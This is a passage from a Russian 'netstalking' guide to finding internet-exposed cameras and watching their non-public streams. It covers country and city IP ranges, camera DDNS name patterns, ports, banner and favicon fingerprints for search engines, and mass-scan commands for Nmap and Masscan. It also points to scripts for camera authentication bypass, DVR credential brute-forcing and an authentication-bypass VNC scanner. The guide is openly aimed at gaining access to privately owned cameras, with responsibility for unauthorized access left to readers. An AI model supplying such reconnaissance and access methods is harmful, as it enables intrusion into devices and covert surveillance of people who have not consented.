Вы находитесь на странице: 1из 116

Расширенное руководство по

онлайн-камерам
v0.3.1

2018
Содержание
1. Предисловие 3

2. Терминология 5

3. Поиск онлайн-камер 6
3.1. Сетевые адреса . . . . . . . . . . . . . . . . . . . . . . . . 7
3.1.1. IP-адреса . . . . . . . . . . . . . . . . . . . . . . . 7
3.1.2. Доменные имена . . . . . . . . . . . . . . . . . . . 9
3.1.3. Порты . . . . . . . . . . . . . . . . . . . . . . . . . 9
3.2. Идентификация камер . . . . . . . . . . . . . . . . . . . . 11
3.2.1. Баннеры . . . . . . . . . . . . . . . . . . . . . . . . 12
3.2.2. Другие характеристики . . . . . . . . . . . . . . . 13
3.3. Клиентский софт . . . . . . . . . . . . . . . . . . . . . . . 13
3.3.1. Nmap . . . . . . . . . . . . . . . . . . . . . . . . . 13
3.3.2. Masscan . . . . . . . . . . . . . . . . . . . . . . . . 17
3.3.3. VNC-scanner . . . . . . . . . . . . . . . . . . . . . 19
3.3.4. KPortScan . . . . . . . . . . . . . . . . . . . . . . . 21
3.3.5. Angry IP Scanner . . . . . . . . . . . . . . . . . . 22
3.3.6. Advanced IP Scanner . . . . . . . . . . . . . . . . . 24
3.3.7. Nesca . . . . . . . . . . . . . . . . . . . . . . . . . 25
3.3.8. RouterScan . . . . . . . . . . . . . . . . . . . . . . 27
3.3.9. Другие инструменты . . . . . . . . . . . . . . . . 28
3.4. Онлайн-софт . . . . . . . . . . . . . . . . . . . . . . . . . 29
3.4.1. Онлайн-базы камер . . . . . . . . . . . . . . . . . 29
3.4.2. Google Search . . . . . . . . . . . . . . . . . . . . 31
3.4.3. Shodan . . . . . . . . . . . . . . . . . . . . . . . . 36
3.4.4. Censys . . . . . . . . . . . . . . . . . . . . . . . . . 40
3.4.5. ZoomEye . . . . . . . . . . . . . . . . . . . . . . . 43
3.4.6. FOFA . . . . . . . . . . . . . . . . . . . . . . . . . 47
3.4.7. IVRE . . . . . . . . . . . . . . . . . . . . . . . . . 51
3.4.8. Другие инструменты . . . . . . . . . . . . . . . . 53

4. Получение доступа 55
4.1. Логины и пароли . . . . . . . . . . . . . . . . . . . . . . . 55
4.1.1. Онлайн-базы логинов, паролей и URL . . . . . . 55
4.1.2. Статистика . . . . . . . . . . . . . . . . . . . . . . 55
4.1.3. Логины и пароли по умолчанию . . . . . . . . . . 57
4.2. Ссылки на трансляции . . . . . . . . . . . . . . . . . . . 60
4.3. Уязвимости . . . . . . . . . . . . . . . . . . . . . . . . . . 61
4.3.1. kcore . . . . . . . . . . . . . . . . . . . . . . . . . 65
4.4. Инструменты . . . . . . . . . . . . . . . . . . . . . . . . . 66

1
4.4.1. Brutus AET2 . . . . . . . . . . . . . . . . . . . . . 66
4.4.2. Burp Suite . . . . . . . . . . . . . . . . . . . . . . 67
4.4.3. THC-Hydra . . . . . . . . . . . . . . . . . . . . . . 71
4.4.4. Cameradar . . . . . . . . . . . . . . . . . . . . . . . 72
4.4.5. hikka . . . . . . . . . . . . . . . . . . . . . . . . . 73
4.4.6. Dahua Brute Pass++ . . . . . . . . . . . . . . . . . 74
4.4.7. Metasploit . . . . . . . . . . . . . . . . . . . . . . . 75
4.4.8. RouterSploit . . . . . . . . . . . . . . . . . . . . . . 77
4.4.9. Другие инструменты . . . . . . . . . . . . . . . . 79

5. Просмотр онлайн-камер 80
5.1. Форматы трансляции . . . . . . . . . . . . . . . . . . . . 80
5.1.1. Обновление изображения . . . . . . . . . . . . . . 80
5.1.2. Потоковое видео . . . . . . . . . . . . . . . . . . . 81
5.1.3. MJPEG . . . . . . . . . . . . . . . . . . . . . . . . 82
5.2. Браузерные плагины . . . . . . . . . . . . . . . . . . . . . 83
5.2.1. Java-апплеты . . . . . . . . . . . . . . . . . . . . . 84
5.2.2. QuickTime Player . . . . . . . . . . . . . . . . . . 88
5.2.3. ActiveX . . . . . . . . . . . . . . . . . . . . . . . . 90
5.2.4. Разнообразные плагины . . . . . . . . . . . . . . . 94
5.3. Софт для просмотра камер . . . . . . . . . . . . . . . . . 97
5.4. Софт для видеотрансляций . . . . . . . . . . . . . . . . . 99

6. Общая информация 104


6.1. Предназначение . . . . . . . . . . . . . . . . . . . . . . . 104
6.2. Наблюдение за камерами . . . . . . . . . . . . . . . . . . 109
6.3. Изучение записей . . . . . . . . . . . . . . . . . . . . . . 111

7. Послесловие 113

Приложение А 114

2
1. Предисловие
Безусловно, просмотр онлайн-трансляций – одно из важнейших
преимуществ развития World Wide Web. Зрение является основным
каналом человеческого восприятия, а визуализация остается наибо-
лее естественным и информативно привлекательным представлением
окружающего мира.
Предназначение данного руководства – дать информацию читате-
лям, заинтересованным в поиске сетевых видеоустройств и в просмот-
ре непубличных онлайн-трансляций. В этом контексте будут рассмат-
риваться онлайн-камеры – устройства, создающие видеотрансляции и
предназначенные, в основном, для частного использования, но доступ-
ные извне для всей остальной Сети. Далее в разделах будут освещены
вопросы поиска камер, доступа к ним, а также особенности тех или
иных видов видеотрансляций.
Следует отметить, что при работе с камерами и, в частности, при
следовании данному руководству рекомендуется проявлять осторож-
ность и не выполнять действий, в последствиях которых вы не уве-
рены. Ответственность за несанкционированный доступ к сетевым
устройствам возлагается на читателей, а авторы напоминают, что в
общем случае вся информация о доступе к камере сохраняется для её
владельца.
Условно работу с онлайн-камерами можно разделить на стадии по-
иска, получения доступа и просмотра (изобр. 1). В соответствии с эти-
ми стадиями выстроена структура руководства, поэтому рекомендует-
ся обращаться к произвольному интересующему вас разделу вместо
последовательного чтения.
Приведённые в документе графические оболочки программ по умол-
чанию относятся к операционной системе Windows 7. Приведённые
в документе консольные команды подразумевают использование ко-
мандных оболочек Linux, Windows Subsystem for Linux, MinGW или
Cygwin.
Данное руководство появилось как результат активностей предста-
вителей субкультуры сетевого сталкинга, нетсталкинга – энтузиастов-
исследователей Сети. В связи с этим авторы выражают благодарность
всем причастным к развитию этого движения, а также просят воспри-
нимать содержание документа через призму нетсталкинга как куль-
турного явления.

3
Изображение 1 — Работа с онлайн-камерами

4
2. Терминология
Онлайн-камеры – сетевые устройства, осуществляющие видео-
трансляцию.
ActiveX – платформа для подключения программных компонент,
используемая в ОС Windows, в частности, в Internet Explorer. Не под-
держивается в других браузерах.
CCTV (Closed-circuit television) – видеонаблюдение, общий термин,
используемый в англоязычной среде.
DVR (Digital Video Recorder) – цифровой видеорегистратор: устрой-
ство для записи, хранения и воспроизведения видео.
HTTP (Hypertext Transfer Protocol) – протокол передачи данных
(изначально гипертекстовых), используется в браузерах. Стандартный
порт – 80.
Iris – регулировка количества света, попадающего на матрицу ка-
меры. От этого зависит резкость изображения и его осветлённость.
NPAPI (Netscape Plugin Application Programming Interface) – уста-
ревшая платформа для разработки плагинов к браузерам. Не поддер-
живается Internet Explorer с 5.5, Google Chrome c 40, Mozilla Firefox
c 43, однако используется во множестве камер.
NVR (Network Video Recorder) – сетевой видеорегистратор: аппа-
ратура, предоставляющая возможность просмотра и управления под-
соединёнными к ней камерами.
RTSP (Real Time Streaming Protocol) – потоковый протокол реаль-
ного времени, предназначен для передачи мультимедийных данных.
PTZ (Pan, Tilt, Zoom) – аббревиатура, означающая возможность
управления камерой (соответственно, панорамирование, наклон, зум).

5
3. Поиск онлайн-камер
Условно выделим три группы способов поиска онлайн-камер:

∙ ручное сканирование адресного пространства;


∙ использование поисковых систем с указанием текстовых шабло-
нов;
∙ поиск в готовых базах данных камер с фильтрацией по характе-
ристикам.

Инструменты для сканирования в основном представлены клиент-


скими программами, т.к. большинство онлайн-сканеров либо доступны
только за абонентскую плату, либо обладают урезанной функциональ-
ностью. К клиентским инструментами относятся широко известные
Nmap, Masscan, ZMap и другие. Описание подобных инструментов
представлено в разделе Клиентский софт.
При использовании поисковых систем необходимо использовать спе-
циальные запросы – дорки (dorks), представляющие собой фильтры
поиска с указанием точного текста и/или других параметров в кон-
тенте страницы. Отметим, что индексируемый поисковиками общего
назначения контент является текстом web-страницы сервера, которой
в случае с камерами является административная панель. Таким обра-
зом, при известных заголовке HTTP-страницы камеры, части её текста
или соответствующего URL возможен поиск экземпляров таких камер
через индексирующие системы. Примеры запросов в поисковых систе-
мах общего назначения приведены в разделе Google Search.
В общем случае, информация из ответа сервера камеры является
баннером протокола HTTP, своеобразным отпечатком страницы. От-
печатки в определённой мере уникальны: для онлайн-камер (как и для
многих сетевых устройств) характерны однообразные заголовки HTTP-
страниц (title), заголовки ответа (headers), шаблоны контента страниц.
Поиск по более точным параметрам возможен с помощью поисковиков
специального назначения (Shodan, ZoomEye) либо по сохранённым ре-
зультатам сканирования с помощью инструментов, упомянутых выше.
Процесс подбора запроса-дорка для поиска онлайн-камеры в общем
случае тривиален. В этом руководстве для каждого поисковика даны
примеры запросов, но, кроме этого, есть и справочник по доркам, и
краткая шпаргалка по их составлению в подразделе Баннеры.
Готовые базы данных, как правило, являются специализированны-
ми развлекательными сайтами, напрямую выводящими видеотрансля-
цию на свою страницу и имеющих категоризацию по типам устройств и

6
производителям. Список подобных сервисов приведён в разделе Онлайн-
базы камер.

3.1. Сетевые адреса


3.1.1. IP-адреса

Предположим, что читающий ознакомлен с понятием IP-адреса как


такового. Здесь лишь напомним, что IP адрес стандарта IPv4 состоит
из 4 чисел от 0 до 255, разделённых точкой. Общее количество таких
адресов – 4 294 967 296. Для реальных хостов 0 и 255 адреса резерви-
руются, также некоторые диапазоны резервируются для использования
в локальных сетях. Это означает, что общее количество реальных IP
несколько ниже.
Следует отметить, что в настоящее время активно продвигается
стандарт IPv6, предоставляющий намного большее адресное простран-
ство и, соответственно, более широкие перспективы для развития IoT
(интернета вещей) и для камер в частности. Аспекты сканирования
диапазона IPv6 будут рассмотрены в следующих версиях руководства.
Также напомним, что в пределах одного адреса могут существо-
вать различные порты (от 1 до 65535). Грубо говоря, если вы знаете
адрес дома, то это ещё не значит, что он открыт для вас – необходимо
найти открытую дверь, но дверей потенциально могут быть тысячи.
В общем случае, за каждым портом закреплена определённая функ-
ция/приложение.
Отметим, что могут существовать различные форматы записи ад-
ресов, которые могут использоваться при сканировании.
CIDR (Classless Inter-Domain Routing) – нотация, которая позволя-
ет записать целую подсеть. Строка при этом состоит из самого адреса
и битовой маски, которая показывает, сколько первых битов адреса
должны оставаться неизменными.
Битовая маска может иметь значение от 0 до 32. Таким образом:

∙ адрес 123.56.78.9/0 означает все возможные адреса (так как 0


битов фиксированы, меняются все биты адреса);

∙ адрес 123.56.78.9/24 означает адреса определенного диапазо-


на 123.56.78.0-123.56.78.255 (так как 24 бита фиксированы,
меняются последние 8 бит = байт = число от 0 до 255);

∙ адрес 123.56.78.9/32 означает один адрес – 123.56.78.9 (так

7
как все 32 бита адреса фиксированы, то адрес может быть запи-
сан только в одном варианте).

Понимание формата необходимо в случае, когда нужно проска-


нировать сеть организации/города/государства/etc, но она (в общем
случае) представляет собой не последовательный диапазон адресов, а
набор различных подсетей. Понимание количества затрагиваемых ад-
ресов позволяет спланировать время и ресурсы.
Для работы при необходимости доступны онлайн-калькуляторы1 и
конвертеры2 .
Простые диапазоны IP-адресов означают последовательное пере-
числение с первого до последнего с учётом формата записи. Таким
образом, диапазон 123.56.78.9-123.56.79.10 будет включать в себя
адреса 123.56.78.9-123.56.78.255 и 123.56.79.0-123.56.78.10 .
Сложные диапазоны IP-адресов означают видоизменение отдель-
ных байт в записи адреса. Например, диапазон 123.56.78-79.9 будет
включать в себя только два адреса, но эти адреса будут непоследова-
тельны. Это формат может быть полезен, но не является общеисполь-
зуемым.
Откуда брать сетевые адреса для сканирования? Ниже пред-
ставлен список некоторых сервисов:

∙ CIPRG3 – Country IP Ranges Generator, генератор IP-диапазонов


по странам с регулярно обновляемой базой;

∙ 4it.me4 – популярный в Рунете сервис, предоставляет IP диапа-


зоны городов (диапазоны/CIDR, два варианта базы: мировая и
Ru-center). В комментариях можно встретить адреса и советы;

∙ ipaddresslocation.org5 – получение IP по стране (диапазоны/CIDR);

∙ countryipblocks.net6 – получение диапазонов IP в 12 разных фор-


матах;

∙ IPdeny7 – готовые для скачивания файлы со блоками IP по стра-


нам.
1
http://www.subnet-calculator.com/cidr.php
2
http://www.ipaddressguide.com/cidr
3
http://services.ce3c.be/ciprg/
4
https://4it.me/getlistip
5
http://www.ipaddresslocation.org/ip_ranges/get_ranges.php
6
https://www.countryipblocks.net/country_selection.php
7
http://www.ipdeny.com/ipblocks/

8
Также не стоит недооценивать поиск по локальным сетям (диапа-
зоны 10.0.0.0/8 , 172.16.0.0/12 , 192.168.0.0/1 , 100.64.0.0/10 ).
Текущую подсеть можно определить, взглянув на полученные устрой-
ством при подключении к сети настройки (назначенный адрес, адрес
шлюза, маска). Часто локальные сети организаций, в том числе и мно-
гих магазинов, кафе и других раздающих WiFi заведений, образуют
территориально разнесённую виртуальную сеть, что означает теорети-
ческую возможность нахождения частных онлайн-камер на большой
территории.

3.1.2. Доменные имена

Доменные имена используются повсеместно и также могут быть


использованы для сканирования. Стоит упомянуть, что IP-адресу в
общем случае не сопоставлено ни одно имя, но возможны и ситуации,
когда адресу сопоставлено несколько DNS-имён. В данном руководстве
особенности сетевой адресации через DNS-записи рассматриваться не
будут, но будут приведены пригодные для поиска шаблоны адресов
сервисов DDNS, предоставляемых производителями камер для поку-
пателей (A – буква, 0 - цифра):

∙ AA0000.myfoscam.org – Foscam;

∙ AAAA.ipcam.hk – EasyN;

∙ A0000.aipcam.com – Apexis;

∙ 000AAAA.nwsvrl.com – Wansview;

∙ A00000.myipcamera.com – Insteon.

Существуют и другие широко используемые DDNS-сервера (напри-


мер, dyndns.org, ddns.net, zapto.org), но подбор их адресов ослож-
нён отсутствием фиксированного формата имени.

3.1.3. Порты

Порт – число от 0 до 65535, используемое для уточнения пара-


метров подключения по IP-адресу. Таким образом, каждое соединение
(подразумевается протоколы TCP и UDP) характеризуется не только
двумя адресами, но и соответствующими портами.

9
Есть стандартные порты8 , которые используются по историческим
причинам и официально закреплены в соответствующих документах.
Локальные копии списка портов есть в любой операционной систе-
ме, например, в файлах C:\Windows\System32\drivers\etc\services и
/etc/services для Windows- и Linux-систем соответственно.
Самый очевидный из общеиспользуемых стандартных портов – 80,
по умолчанию используемый для доступа к сайтам по протоколу HTTP.
Большая часть онлайн-камер, имеющих web-интерфейс, доступны имен-
но через этот порт.
Другие наиболее часто используемые порты для web-интерфейсов
камер9 , по убыванию популярности: 81, 8080, 8000, 82, 8081, 9000,
60001, 88, 8082, 83, 85, 84, 8888, 1024, 90.
Для других протоколов, в том числе и закрытых медиа-протоколов
конкретных производителей камер, используются свои специфические
порты:

∙ 554, 8554 – порты RTSP-протокола для потоковых видеотранс-


ляций;

∙ 37777 – медиа-порт камер Dahua DVR;

∙ 34567 – медиа-порт различных DVR;

∙ 5150, 5160 – медиа-порты NUUO DVR/NVR;

∙ 9000, 2000, 5000, 7000 – медиа-порты различных онлайн-


камер.

Другие используемые для сервисов камер порты10 , в порядке убы-


вания популярности у производителей: 9091, 5050, 8016, 3357, 8008,
4000, 777, 12345, 18600.
Информацию об используемых по умолчанию портах всегда можно
прочесть в руководствах к конкретным моделям. Порты могут мето-
дично переназначаться какой-либо организацией, закупившей линей-
ку оборудования или устанавливающей камеры у клиентов. В этих
случаях локализовать открытые порты можно с помощью сканирова-
ния всех портов одного экземпляра и последующей проверки других
онлайн-камер в изучаемой местности/подсети.
8
https://ru.wikipedia.org/wiki/Список_портов_TCP_и_UDP
9
По данным Casca, 05.2017
10
По данным Hit-Mob.com, https://hit-mob.com/contact/default-ports-for-devices/

10
3.2. Идентификация камер
В явном или неявном виде, определение устройств как онлайн-
камер в процессе ручного или автоматизированного поиска выполня-
ется всегда. Это может быть как поиск IP с конкретными открытыми
портами (редкие порты служат хорошим отличительным признаком),
так и получение отпечатка ответа на запрос и сравнение его с извест-
ным отпечатком. Процесс фингерпринтинга может происходить и на
этапе фильтрации диапазонов адресов (например, через Masscan), и
при проверке доступа (например, с помощью hikka). Более того, даже
просмотр HTML-страницы в браузере является происходящим в со-
знании человека процессом идентификации: ключевые слова Camera,
DVR, Surveillance, наличие меняющегося изображения, кнопки управ-
ления, список каналов – всё это является совокупностью признаков,
по которым можно определить интерфейс онлайн-камеры. Примеры
типовых интерфейсов страниц приведены на изобр. 63.

Изображение 2 — Веб-интерфейс камер NetSurveillance

11
Изображение 3 — Веб-интерфейс камер Foscam

3.2.1. Баннеры

Баннеры – это стандартные строки приветствия для каждого серви-


са/протокола, которые устройство отправляет в ответ на запрос. Текст
баннера уникален для каждого сервиса (и часто – для каждой его
версии). Для протокола HTTP баннером в общем случае считается
всё тело ответа (GET-запрос), но также можно выделить и заголовки
ответа как более статичную и уникально идентифицирующую часть
(HEAD-запрос). Следует отметить, что каждый сервер уникальным
образом отвечает на запросы разных типов и разного синтаксиса, что
само по себе является отличительным признаком сервера и устройства,
на котором он располагается. На этом принципе базируется, например,
мощный механизм распознавания по отпечаткам Nmap.
В числе наиболее часто уникальных характеристик для HTTP-
баннера можно перечислить следующие: заголовок сервера ( Server ),
заголовок аутентификации ( Www-Authenticate ), заголовок страницы
(содержимое тега <title>), уникальные сочетания тегов и слов в тек-
сте страницы (содержимое тега <body>).
Иногда производители скрывают web-интерфейсы камер за аутен-
тификацией по логину-паролю, не раскрывая в баннере характери-
стик устройства, но забывая о путях определения через другие сер-
висы. Так, камеры EverFocus возможно определить с помощью Telnet-
баннера (запрос 23.telnet.banner.banner: "everfocus login:" в
Censys), а камеры AXIS – с помощью FTP-баннера (запрос
21.ftp.banner.banner: axis в Censys).

12
3.2.2. Другие характеристики

Также необходимо учитывать все дополнительные данные, которые


даёт предварительный анализ ответов сервера: так, с помощью скрипта
http-favicon через Nmap можно получить MD5-хэш иконки страни-
цы (favicon). Зная его, в индексирующей такие данные системе можно
найти все страницы, содержащие ссылку на аналогичный favicon. На-
пример, в IVRE для поиска камер марки VideoEdge достаточно запро-
са script:http-favicon:/153B150C0F8A39FD26BC8BC4AAC70E06/ . Ана-
логичный механизм есть в Shodan: часть камер Hikvision находятся
запросом http.favicon.hash:999357577 .
Разумеется, для получения точного отпечатка нужна информация
хотя бы об одном экземпляре устройства. Часто производители на сай-
тах дают возможность посмотреть демо-камеру либо приводят скрин-
шоты/видео, на которых видны отличительные черты интерфейса. Ес-
ли этого нет – почти всегда есть возможность скачать прошивку, ко-
торая, по сути, является образом файловой системы онлайн-камеры.
Соответственно, распаковав эту прошивку с помощью специальных
утилит (например, binwalk), можно обнаружить файлы html, готовые
для анализа и извлечения отпечатка.

3.3. Клиентский софт


3.3.1. Nmap

В качестве инструмента сканирования IP-адресов в первую оче-


редь следует рассмотреть Nmap. Это широко используемая консоль-
ная утилита для сканирования IP-сетей в большим количеством воз-
можностей. Здесь не будет рассматриваться весь их спектр, а толь-
ко минимально необходимые параметры поиска. Полное руководство
можно прочесть на официальном сайте11 , начинающим рекомендует-
ся ознакомиться с вольным переводом англоязычного руководства от
нетсталкинг-группы DWR12 . Рекомендуется использовать консольный
интерфейс, однако, доступен и официальный графический: Zenmap13 .
11
https://nmap.org/man/ru/
12
https://github.com/deep-web-research/ultimate-netstalking-guide/blob/master/nmap-guide.md
13
https://nmap.org/zenmap/

13
Изображение 4 — Nmap – определение HTTP-заголовка

Запускать инструмент желательно от имени администратора, так


как низкоуровневый доступ к сетевому адаптеру будет недоступен про-
стому пользователю. В случае ошибки доступа (изобр. 5) в некоторых
случаях достаточно дописать опцию --unprivileged , однако переза-
пуск под администратором может быть единственным выходом. То же
относится и к запуску графической оболочки.

Изображение 5 — Nmap – ошибка при запуске

Параметры
-p – указание портов для сканирования, можно перечислять через
запятую и задавать диапазонами (-p80-89,8000-8099);
-Pn – пропустить проверку доступности адреса (может не отвечать
на пинг, но порты будут открыты);
-T – указание режима сканирования (по названию или цифре),
рекомендуется использовать -T4 для обычного и -T3 для осторожного
сканирования;
-sC – запуск используемых по умолчанию скриптов;
--script – указание конкретного скрипта для выполнения после
= , например, http-title ;
--scripts-args – указание параметров для выполнения скриптов
NSE, например http.useragent="Mozilla/5.0" ;
-sV – определение сервисов и их версий по открытым портам;
-O – определение операционной системы;

14
-A – набор агрессивных опций сканирования: определение серви-
сов, ОС, скрипты по умолчанию и получение маршрута до адреса.
Примеры использования
1. Просканировать подсеть на наличие устройств с открытыми 80
и 8080 портом:
nmap 123.42.42.24/16 -T4 -n -Pn -p 80,8080 --open --script \
http-title --stats-every 5s
При этом каждые 5 секунд будет выводиться информация о про-
цессе сканирования, а затем выведутся найденные хосты с заголовка-
ми HTTP-страниц, по которым можно вручную опознать камеры (см.
шаблоны поиска в разделе Google Search). Указанные порты 80 и 8080
являются одними из самых популярных HTTP-портов (см. раздел Пор-
ты).
Для упрощения работы можно использовать графическую оболоч-
ку Zenmap. Опции сканирования вводятся в поле "команда"(изобр. 6),
также там уже есть предустановленные профили сканирования, на ко-
торые можно ориентироваться.

15
Изображение 6 — Графический интерфейс Zenmap

2. Сгенерировать HTML-отчёт по полному сканированию хостов


подсети 124.63.12.42/24 на 8000 порте:
nmap -A -T4 -Pn -vv 124.63.12.42/24 -p8000 -oX res.xml xsltproc
res.xml > res.html
Для NMap также существует большое количество скриптов, со-
зданных энтузиастами и касающихся онлайн-камер, найти скрипт все-
гда можно по точному названию. Перечень некоторых скриптов со
ссылками:

∙ http-trendnet-tvip110w.nse14 – поиск камер TRENDnet с воз-


можностью доступа без авторизации к трансляции по адресу
/anony/mjpg.cgi;

∙ http-vivotek-camera-info.nse15 – получение подробной информа-


14
https://github.com/cldrn/external-nse-script-library/blob/master/http-trendnet-tvip110w.nse
15
https://github.com/cldrn/external-nse-script-library/blob/master/http-vivotek-camera-info.nse

16
ции и настроек из камер производителя Vivotek из файла по ад-
ресу /cgi-bin/admin/getparamjs.cgi;
∙ rtsp-url-brute.nse16 – предустановленный скрипт Nmap для под-
бора пути видеотрансляции RTSP (для подобных целей рекомен-
дуется использование утилиты Cameradar);
∙ http-cctv-interface.nse17 – тривиальный скрипт для определе-
ния DVR IT ActiveX камеры по совпадению подстроки в HTTP-
баннере, может быть легко расширен для определения других
камер;
∙ cctv-auth-bypass.nse18 – извлечениe настроек камеры (PPOE,
DDNS, FTP логины/пароли) из файла по адресу /DVR.cfg;
∙ cctv-dvr-brute.nse19 – подбор логина и пароля для определённых
типов DVR, доступных по портам 5920 и 5921;
∙ rtsp-screenshot.nse20 – скриншоты видеотрансляции RTSP, ис-
пользует ffmpeg и требует запуск на Linux; часть открытой си-
стемы для сканирования Сети IVRE21 .

Определение устройства
Возможные проблемы и их решения
Если при сканировании большое количество портов помечается как
открытые с пометкой tcpwrapped, то сервер принял пакеты для под-
ключения, но закрыл соединение. Как правило, это означает наличие
неких программных правил, не разрешающих подключение к этим пор-
там от неизвестных адресов.
Иногда доступ к портам преграждается на внешнем периметре –
это может быть вызвано реакцией файерволов на сканирование портов
опцией -sV и честный User-Agent сканера. Решить это можно подме-
ной заголовка запроса ( --scripts-args http.useragent=... и более
аккуратным сканированием адреса (опцией -T3 ).

3.3.2. Masscan

Masscan – инструмент для массового сканирования IP-сетей, один


из самых быстрых сканеров. По утверждениям разработчиков, может
16
https://github.com/nmap/nmap/blob/master/scripts/rtsp-url-brute.nse
17
https://github.com/h4ck3rk3y/nmap-exp-gyani/blob/master/scripts/http-cctv-interface.nse
18
https://github.com/h4ck3rk3y/nmap-exp-gyani/blob/master/scripts/cctv-auth-bypass.nse
19
https://github.com/h4ck3rk3y/nmap-exp-gyani/blob/master/scripts/cctv-dvr-brute.nse
20
https://github.com/cea-sec/ivre/blob/master/nmap_scripts/rtsp-screenshot.nse
21
https://ivre.rocks/

17
просканировать весь Интернет за 5 минут.
Особенность Masscan в использовании своего сетевого стека для
асинхронной отправки сетевых пакетов (это требует административ-
ных привилегий при запуске). При этом максимальная скорость ска-
нирования через Windows может составлять 300 тысяч пакетов в се-
кунду, а на Linux – 1,5 миллиона пакетов в секунду, в 5 раз больше.
Необходимо отметить, что скорость регулируется отдельным парамет-
ром и по умолчанию ограничена в 100 пакетов в секунду.
Текстовый результат работы Masscan может быть аналогичен nmap.
Для дальнейшей обработки рекомендуются форматы вывода -oG (grepable,
построчный, удобный для обработки консольными утилитами) и -oL
(построчный, простой вывод найденных открытых IP и порта).
Параметры
--rate – скорость сканирования, пакетов в секунду, по умолчанию
100, рекомендуется выставлять в десятках тысяч;
--banners – получение баннеров из открытых портов;
--source-ip – указание IP отправителя для подмены в рассылае-
мых пакетах;
-o – флаг для вывода результата сканирований (-oX, -oL, -oG и
другие).
Примеры использования
1. Просканировать локальные сети на наличие устройств с откры-
тым 8000 портом с увеличенной скоростью:
masscan 10.0.0.0/8 192.168.0.0/16 172.16.0.0/12 \
-p8000 --open-only --rate 100000
2. Просканировать подсеть 213.32.52.10/16 на открытые порты 80,
8000, 8080 с сохранением баннеров, выводом результатов в файл и
ограничением скорости в 10000 пакетов в секунду:
masscan 213.32.52.10/16 -p80,8000,8080 -oG masscan.txt \
--rate 10000 --banners
В результатах сканирования можно различить административные
панели онлайн-камер по баннерам (изобр. 7).

18
Изображение 7 — Результат запуска Masscan

3.3.3. VNC-scanner

VNC (RealVNC Bypass Authentication Scanner) – консольный ска-


нер, используемый в основном для скана IP-адресов с открытым пор-
том 3389 (удалённый рабочий стол ОС Windows, см. раздел Порты).
Сайт разработчиков22 в настоящее время не работает.
Основное предназначение программы – быстрый и удобный поиск
открытых портов. Определения протокола и сервиса на порте при этом
не происходит.
Широко распространена графическая версия сканера VNC-scanner
GUI. Настройки и использование далее будут рассматриваться для
этой версии.
22
http://heapoverflow.com/

19
Изображение 8 — VNC scanner GUI

Для запуска необходим лишь один exe-файл, сама консольная ути-


лита запакована в нём, а используемые параметры наглядно отобра-
жаются в графическом интерфейсе. После нажатия на кнопку Start
scan создаётся и запускается файл start.bat, в который записывается
список команд для консольной утилиты с параметрами.

Изображение 9 — Cкрипт для запуска VNC

Параметры
vnc – запускаемый файл;
-i – IP-адреса для сканирования (используются CIDR и простые
диапазоны) через переносы строк;

20
-p – порты для сканирования, допускается перечисление через
запятую или диапазоны;
-cT – использование метода TCPconnect для проверки портов;
-T – количество потоков для сканирования, по умолчанию 500.
Результаты сканирования дописываются в файл VNC_bypauth.txt
в виде <IP>:<порт> . Для получения чистого списка IP можно вос-
пользоваться парсером: в поле Port следует ввести порт, по которому
нужно отсеять список из файла результатов, в поля In и Out мож-
но ввести имена файлов, если необходимо использовать файлы не по
умолчанию. После нажатия кнопки Start Parser сформируется тексто-
вый файл со списком IP без портов.
Загрузка диапазонов IP (Get diap list) с сайта Proxysecurity.com в
настоящее время не работает.
Также следует отметить полезные служебные функции: Open scan
ranges – загрузка встроенного диапазона IP-адресов; Load List и Save
List – загрузка и сохранение введённых диапазонов соответственно;
Clear List – очистка введённых диапазонов.

3.3.4. KPortScan

Простой сетевой сканер с графическим интерфейсом и минимумом


настроек (изобр. 10). Быстрее VNС, но результаты сканирования хуже.
Принимает только простые диапазоны. Имеется визуальное отображе-
ния прогресса сканирования.
Основное предназначение программы – быстрый и удобный поиск
открытых портов. Определения протокола и сервиса на порте при этом
не происходит.
Параметры
threads – количество потоков сканирования;
port – искомый порт;
without port – сохранение результатов в файл results.txt без пор-
та;
with port – сохранение результатов в файл results.txt в виде
<IP>:<порт> ;
append to file – добавляет новые результаты к предыдущим ре-
зультатам, находящимся в файле;
clear file and add – удаляет предыдущие результаты, сохранен-
ные в файле, и записывает новые результаты в чистый файл.
Загрузка диапазонов IP (Load ranges) с сайта Proxysecurity.com в

21
настоящее время не работает.
Остановить сканирование можно двумя способами: быстрым (fast)
и медленным (slow). В первом случае сканирование прервётся мгно-
венно, а во втором программа завершит работу с текущим диапазоном
(удобно при наличии большого количества диапазонов).

Изображение 10 — KPortScan

3.3.5. Angry IP Scanner


Angry IP Scanner23 – простой инструмент для сканирования портов,
чрезвычайно удобный возможностями кастомизации.
Для сканирования можно использовать как диапазон IP (возмож-
но определение адреса по известному имени хоста), так и случайные
адреса и списки IP.
Далее будет рассматриваться настройка программы для версии 3.4.
Открываем Tools – Preferences. Во вкладке Scanning выставляем
Pinging method Combined UDP+TCP – более продуктивный метод
сканирования. Количество портов можно установить выше, ориентиру-
ясь на загрузку процессора при сканировании. Во вкладке Ports встав-
ляем в многострочное поле ввода список необходимых портов (можно
использовать порты из раздела Статистика). Во вкладке Display вы-
ставляем отображение только хостов с открытыми портами (Hosts with
open ports only).
23
http://angryip.org/

22
Открываем Tools – Fetchers. Колонка IP будет отображаться в лю-
бом случае, а из других полей необходимо только Web detect (опре-
деление имени сервера).
Открываем Command – Open – Edit openers. Здесь находятся на-
страиваемые команды, которые можно выполнить для каждого из най-
денных результатов. Для сканирования камер очень полезна опция
открытия браузера с найденным IP, а также геолокация (заданная
по умолчанию ссылка не работает). Ниже в таблице приведены при-
меры полезных команд. Необходимо отметить, что горячие клавиши
Ctrl+1. . . Ctrl+9 для команд не будут обновлены непосредственно по-
сле редактирования команд, надо перезапустить программу.
Таблица 1 — Команды для Angry IP Scanner
Opener name Run program Execution Описание
(menu item) in the terminal string
Internet Выставить start iexplore Запуск Internet
Explorer ${fetcher.ip} Explorer c вы-
бранным IP
Google Chrome Выставить start chrome Запуск Google
${fetcher.ip} Chrome с вы-
бранным IP
Mozilla Firefox Выставить start firefox Запуск Mozilla
${fetcher.ip} Firefox с вы-
бранным IP
Браузер по Не выставлять http:// Запуск браузе-
умолчанию ${fetcher.ip}/ ра по умолча-
нию с выбран-
ным IP
Геолокация Не выставлять http://infosniper. Запуск браузе-
net/index.php? ра по умолча-
ip_address= нию с геолока-
${fetcher.ip} цией для вы-
бранного IP

Пример результатов сканирования приведён на изобр. 11.

23
Изображение 11 — Angry IP Scanner

3.3.6. Advanced IP Scanner


Advanced IP Scanner24 – популярная удобная программа для скани-
